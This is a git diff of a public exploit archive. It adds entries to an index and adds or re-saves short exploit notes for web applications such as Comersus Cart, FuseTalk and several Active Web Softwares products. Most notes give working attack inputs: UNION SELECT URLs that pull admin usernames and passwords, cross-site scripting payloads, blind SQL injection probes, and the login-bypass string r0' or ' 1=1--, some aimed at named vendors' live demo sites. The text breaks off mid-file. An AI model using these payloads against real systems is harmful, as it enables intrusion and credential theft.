Larholm",windows,remote,0 +30177,platforms/php/webapps/30177.txt,"PlaySMS <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 +30180,platforms/php/webapps/30180.txt,"vBulletin 5.?.x - Remote Code Execution",2013-12-09,"Sergio Yoshikata",php,webapps,0 +30181,platforms/windows/remote/30181.txt,"Sam Spade 1.14 - Buffer Overflow",2013-12-10,"aLt fuxOr",windows,remote,0 +30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 +30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 Remote Buffer Overflow Vulnerability",2007-06-12,"Cody Pierce",linux,remote,0 +30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String Vulnerability",2007-06-12,"Nir Rachmel",multiple,dos,0 +30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial Of Service Vulnerability",2007-05-13,"Moshe Ben-Abu",windows,dos,0 +30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability",2007-06-14,Anonymous,jsp,webapps,0 +30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.PHP Cross-Site Scripting Vulnerability",2007-06-14,"Edi Strosar",php,webapps,0 +30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability",2007-06-14,"Rajat Swarup",jsp,webapps,0 +30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 +30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0 +30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0 +30195,platforms/asp/webapps/30195.txt,"Webnet Studio - SQL Injection Vulnerability",2013-12-10,"a a",asp,webapps,0 +30196,platforms/windows/local/30196.py,"Mediacoder v0.8.0 (m3u) - Buffer Overflow Vulnerability",2013-12-10,"Return C",windows,local,0 +30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.PHP SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0 +30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting Vulnerability",2007-06-18,GeFORC3,asp,webapps,0 +30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0 +30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 Index.PHP Cross Site Scripting Vulnerability",2007-08-18,Serapis.net,php,webapps,0 +30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.PHP Cross Site Scripting Vulnerability",2007-06-18,RMx,php,webapps,0 +30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 AuthError.CFM SQL Injection Vulnerability",2007-06-19,"Ivan Almuina",cfm,webapps,0 +30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 +30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 comersus_customerAuthenticateForm.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 +30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 +30206,platforms/cfm/webapps/30206.txt,"FuseTalk <= 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30207,platforms/asp/webapps/30207.txt,"FuseTalk <= 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 +30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 (.ico) - Buffer Overflow Vulnerability",2013-12-11,"Core Security",windows,dos,0 +30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080 +30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 Administrative Login Bypass",2013-12-11,metasploit,multiple,remote,80 +30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0 +30212,platforms/php/remote/30212.rb,"vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 +30213,platforms/php/webapps/30213.txt,"eFront v3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 +30214,platforms/php/webapps/30214.txt,"Wordpress Skinizer Theme - Remote File Upload Vulnerability",2013-12-11,"terminator ashiyane",php,webapps,0 +30215,platforms/hardware/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,hardware,webapps,0 diff --git a/platforms/aix/local/1001.txt b/platforms/aix/local/1001.txt index 9fa807a63..25f6792d7 100755 --- a/platforms/aix/local/1001.txt +++ b/platforms/aix/local/1001.txt @@ -284,6 +284,6 @@ bash-2.05b# bash-2.05b# rm /tmp/.bel* bash-2.05b# rm /tmp/passwd bash-2.05b# - - -# milw0rm.com [2005-05-19] + + +# milw0rm.com [2005-05-19] diff --git a/platforms/asp/webapps/30141.txt b/platforms/asp/webapps/30141.txt new file mode 100755 index 000000000..9508b9421 --- /dev/null +++ b/platforms/asp/webapps/30141.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24288/info + +HĂ¼nkaray Okul PortalĂ½ is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. + +HĂ¼nkaray Okul PortalĂ½ 1.1 is vulnerable to this issue. + +http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/30159.txt b/platforms/asp/webapps/30159.txt new file mode 100755 index 000000000..de165b54c --- /dev/null +++ b/platforms/asp/webapps/30159.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24345/info + +ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this issue to download arbitrary files within the context of the affected webserver. + +http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp \ No newline at end of file diff --git a/platforms/asp/webapps/30165.txt b/platforms/asp/webapps/30165.txt new file mode 100755 index 000000000..0dd5bc4bc --- /dev/null +++ b/platforms/asp/webapps/30165.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24379/info + +Ibrahim Ă?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. + +Ibrahim Ă?AKICI Okul Portal 2.0 is vulnerable to this issue. + +http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/30195.txt b/platforms/asp/webapps/30195.txt new file mode 100755 index 000000000..f52da411a --- /dev/null +++ b/platforms/asp/webapps/30195.txt @@ -0,0 +1,20 @@ +#******************************************************************************** +# Exploit Title : Webnet Studio Sql Injection Vulnerability +# +# Exploit Author : Ashiyane Digital Security Team +# +# Vendor Homepage : http://www.webnetstudio.it +# +# Google Dork : intext:"powered by Webnet Studio" +# +# Date: 2013-12-10 +# +# Tested on: Windows 7 , Linux +# +# discovered by : ACC3SS +------------------------------------------------------------------- +# Exploit : Sql Injection +# +# Location : [Target]/content.asp?ID=[Sql Injection] +# +###################### \ No newline at end of file diff --git a/platforms/asp/webapps/30198.txt b/platforms/asp/webapps/30198.txt new file mode 100755 index 000000000..9563c479e --- /dev/null +++ b/platforms/asp/webapps/30198.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24515/info + +TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/TDizin/arama.asp?ara= ">&submit=+T%27ARA+ \ No newline at end of file diff --git a/platforms/asp/webapps/30203.txt b/platforms/asp/webapps/30203.txt new file mode 100755 index 000000000..d9590dd69 --- /dev/null +++ b/platforms/asp/webapps/30203.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/24562/info + +Comersus Cart is affected by multiple input validation vulnerabilities. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Comersus Cart 7.0.7 is vulnerable; other versions may also be affected. + +http://www.example.com/store/comersus_optReviewReadExec.asp?idProduct=' \ No newline at end of file diff --git a/platforms/asp/webapps/30204.txt b/platforms/asp/webapps/30204.txt new file mode 100755 index 000000000..81e6260d2 --- /dev/null +++ b/platforms/asp/webapps/30204.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/24562/info + +Comersus Cart is affected by multiple input validation vulnerabilities. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Comersus Cart 7.0.7 is vulnerable; other versions may also be affected. + +http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="> \ No newline at end of file diff --git a/platforms/asp/webapps/30205.txt b/platforms/asp/webapps/30205.txt new file mode 100755 index 000000000..7f04e1fd4 --- /dev/null +++ b/platforms/asp/webapps/30205.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/24562/info + +Comersus Cart is affected by multiple input validation vulnerabilities. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Comersus Cart 7.0.7 is vulnerable; other versions may also be affected. + +http://www.example.com/path/store/comersus_message.asp?message= http://www.example.com/path/store/comersus_message.asp?message=Username:
Password:
\ No newline at end of file diff --git a/platforms/asp/webapps/30207.txt b/platforms/asp/webapps/30207.txt new file mode 100755 index 000000000..d99c58c6d --- /dev/null +++ b/platforms/asp/webapps/30207.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24563/info + +FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/3549.txt b/platforms/asp/webapps/3549.txt index 5cd9f5ccc..b008b6c32 100755 --- a/platforms/asp/webapps/3549.txt +++ b/platforms/asp/webapps/3549.txt @@ -1,18 +1,18 @@ -#Title : Active Trade Remote SQL Injection Vulnerability -#Author : CyberGhost -#Demo Page : http://www.activewebsoftwares.com/demoactivetrade -#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32 - -#Vuln. - -#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1 -#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1 - -#Admin Login : /admin.asp -==================================== - -Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3 - -And All TURKISH HACKERS ! - -# milw0rm.com [2007-03-23] +#Title : Active Trade Remote SQL Injection Vulnerability +#Author : CyberGhost +#Demo Page : http://www.activewebsoftwares.com/demoactivetrade +#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32 + +#Vuln. + +#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1 +#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1 + +#Admin Login : /admin.asp +==================================== + +Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3 + +And All TURKISH HACKERS ! + +# milw0rm.com [2007-03-23] diff --git a/platforms/asp/webapps/7137.txt b/platforms/asp/webapps/7137.txt index 734e9477c..0d72f2da4 100755 --- a/platforms/asp/webapps/7137.txt +++ b/platforms/asp/webapps/7137.txt @@ -1,15 +1,15 @@ -/* - OpenASP <= 3.0 Blind SQL Injection Vulnerability - ----------------------------------------------------- - by athos - staker[at]hotmail[dot]it - thanks XaDoS,anyway i've found another sql injection - http://openasp.it - ----------------------------------------------------- - - default.asp?modulo=pages&idpage=1 or 1=1 (true) - default.asp?modulo=pages&idpage=1 or 1=2 (false) - default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/* - -*/ - -# milw0rm.com [2008-11-17] +/* + OpenASP <= 3.0 Blind SQL Injection Vulnerability + ----------------------------------------------------- + by athos - staker[at]hotmail[dot]it + thanks XaDoS,anyway i've found another sql injection + http://openasp.it + ----------------------------------------------------- + + default.asp?modulo=pages&idpage=1 or 1=1 (true) + default.asp?modulo=pages&idpage=1 or 1=2 (false) + default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/* + +*/ + +# milw0rm.com [2008-11-17] diff --git a/platforms/asp/webapps/7278.txt b/platforms/asp/webapps/7278.txt index 0317eb762..698a0aa07 100755 --- a/platforms/asp/webapps/7278.txt +++ b/platforms/asp/webapps/7278.txt @@ -1,42 +1,42 @@ -[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ - [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability - - [~]Vendor: www.activewebsoftwares.com - - [~]Software: Active Membership v 2 - - [~]author: ((Ñ3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] -----------------------------{str0ke}------------------------------ - - - [~] Exploit: - - username: r0' or ' 1=1-- - password: r0' or ' 1=1-- - - - [~]login 4 d3m0: - - http://www.activewebsoftwares.com/demoactivemembership/account.asp - - [~]-----------------------------{str0ke}--------------------------------------------------- - - [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker - [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهÙر٠- [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - - [~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-29] +[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ + [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability + + [~]Vendor: www.activewebsoftwares.com + + [~]Software: Active Membership v 2 + + [~]author: ((Ñ3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] -----------------------------{str0ke}------------------------------ + + + [~] Exploit: + + username: r0' or ' 1=1-- + password: r0' or ' 1=1-- + + + [~]login 4 d3m0: + + http://www.activewebsoftwares.com/demoactivemembership/account.asp + + [~]-----------------------------{str0ke}--------------------------------------------------- + + [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker + [~] + [~] spechial thanks : dolly & 7am3m & عماد ,الزهÙر٠+ [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + + [~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-29] diff --git a/platforms/asp/webapps/7279.txt b/platforms/asp/webapps/7279.txt index c26a8ce0e..2ca143fa7 100755 --- a/platforms/asp/webapps/7279.txt +++ b/platforms/asp/webapps/7279.txt @@ -1,45 +1,45 @@ -[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ - وما أوتÙتم من العلم الا قلÙلا -[~]-------------------------------صدق الله العظÙÙ…------------------------------- - - [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability - - [~]Vendor: www.activewebsoftwares.com - - [~]Software: eWebquiz v 8 - - [~]author: ((Ñ3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] -----------------------------{str0ke}------------------------------ - - - [~] Exploit: - - username: r0' or ' 1=1-- - password: r0' or ' 1=1-- - - - [~]login 4 d3m0: - - http://www.activewebsoftwares.com/demoewebquiz/register.asp - - [~]-----------------------------{str0ke}--------------------------------------------------- - - [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker - [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهÙر٠- [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - - [~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-29] +[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ + وما أوتÙتم من العلم الا قلÙلا +[~]-------------------------------صدق الله العظÙÙ…------------------------------- + + [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability + + [~]Vendor: www.activewebsoftwares.com + + [~]Software: eWebquiz v 8 + + [~]author: ((Ñ3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] -----------------------------{str0ke}------------------------------ + + + [~] Exploit: + + username: r0' or ' 1=1-- + password: r0' or ' 1=1-- + + + [~]login 4 d3m0: + + http://www.activewebsoftwares.com/demoewebquiz/register.asp + + [~]-----------------------------{str0ke}--------------------------------------------------- + + [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker + [~] + [~] spechial thanks : dolly & 7am3m & عماد ,الزهÙر٠+ [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + + [~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-29] diff --git a/platforms/asp/webapps/7281.txt b/platforms/asp/webapps/7281.txt index 95eda3518..e39d08e76 100755 --- a/platforms/asp/webapps/7281.txt +++ b/platforms/asp/webapps/7281.txt @@ -1,45 +1,45 @@ -[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ - [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability - - [~]Vendor: www.activewebsoftwares.com - - [~]Software: Active Web Mail v 4 - - [~]author: ((Ñ3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] -----------------------------{str0ke}------------------------------ - - - [~] Exploit: - - Email: any mail - - password: r0' or ' 1=1-- - - - [~]login 4 d3m0: - - www.activewebsoftwares.com/DemoActiveWebmail/login.aspx - - - - [~]-----------------------------{str0ke}--------------------------------------------------- - - [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker - [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهÙر٠- [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - - [~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-29] +[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ + [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability + + [~]Vendor: www.activewebsoftwares.com + + [~]Software: Active Web Mail v 4 + + [~]author: ((Ñ3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] -----------------------------{str0ke}------------------------------ + + + [~] Exploit: + + Email: any mail + + password: r0' or ' 1=1-- + + + [~]login 4 d3m0: + + www.activewebsoftwares.com/DemoActiveWebmail/login.aspx + + + + [~]-----------------------------{str0ke}--------------------------------------------------- + + [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker + [~] + [~] spechial thanks : dolly & 7am3m & عماد ,الزهÙر٠+ [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + + [~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-29] diff --git a/platforms/asp/webapps/7288.txt b/platforms/asp/webapps/7288.txt index bc5603afe..891f011d6 100755 --- a/platforms/asp/webapps/7288.txt +++ b/platforms/asp/webapps/7288.txt @@ -1,68 +1,68 @@ -[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ - [~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability - - [~]Vendor:www.activewebsoftwares.com - - [~]Software: Active Web Mail v 4 - - [~]author: ((Ñ3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] ----------------------------------------------------------- - - - [~]3xpL0!7 4 d3m0: - - www.activewebsoftwares.com/DemoActiveWebmail/popaccounts.aspx?TabOpenQuickTab1={bL!ND} - - 0R - - www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke} - - oÑ - - www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((Ñ3d D3v!L)) - - [~] 8L!/\/D: - - 7Ru3 : popaccounts.aspx?TabOpenQuickTab1=1 and 1=1 - - f4L53: popaccounts.aspx?TabOpenQuickTab1=1 and 1=2 - - 0R - - 7Ru3 : addressbook.aspx?TabOpenQuickTab1=1 and 1=1 - - f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2 - - 0Ñ - - 7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1 - - f4L53: emails.aspx?TabOpenQuickTab1=1 and 1=2 - -N073: - -! 7h!/\/k u can f!nd m0r3 - -just let your m1nd breath ;) - -[~]-------------------------------------------------------------------------------- - - [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهÙر٠- [~] - [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} - [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - -[~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-29] +[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ + [~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability + + [~]Vendor:www.activewebsoftwares.com + + [~]Software: Active Web Mail v 4 + + [~]author: ((Ñ3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] ----------------------------------------------------------- + + + [~]3xpL0!7 4 d3m0: + + www.activewebsoftwares.com/DemoActiveWebmail/popaccounts.aspx?TabOpenQuickTab1={bL!ND} + + 0R + + www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke} + + oÑ + + www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((Ñ3d D3v!L)) + + [~] 8L!/\/D: + + 7Ru3 : popaccounts.aspx?TabOpenQuickTab1=1 and 1=1 + + f4L53: popaccounts.aspx?TabOpenQuickTab1=1 and 1=2 + + 0R + + 7Ru3 : addressbook.aspx?TabOpenQuickTab1=1 and 1=1 + + f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2 + + 0Ñ + + 7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1 + + f4L53: emails.aspx?TabOpenQuickTab1=1 and 1=2 + +N073: + +! 7h!/\/k u can f!nd m0r3 + +just let your m1nd breath ;) + +[~]-------------------------------------------------------------------------------- + + [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهÙر٠+ [~] + [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} + [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + +[~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-29] diff --git a/platforms/asp/webapps/7293.txt b/platforms/asp/webapps/7293.txt index 72d1663cb..ab27b5c16 100755 --- a/platforms/asp/webapps/7293.txt +++ b/platforms/asp/webapps/7293.txt @@ -1,66 +1,66 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!] -*********************************************************************************************************************************************************** -+---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦ -¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦ -¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -Bypass : ........ - -Go To The Admin Panel. -and Login with this information : - -username : r0' or ' 1=1-- -password : r0' or ' 1=1-- - -To Test : - -http://activewebsoftwares.com/demoactivewebhelpdesk/adminlogin.aspx?ReturnURL=admindefault.aspx - -EnjoY. - - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = -___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-29] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!] +*********************************************************************************************************************************************************** ++---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek ) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦ +¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦ +¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This 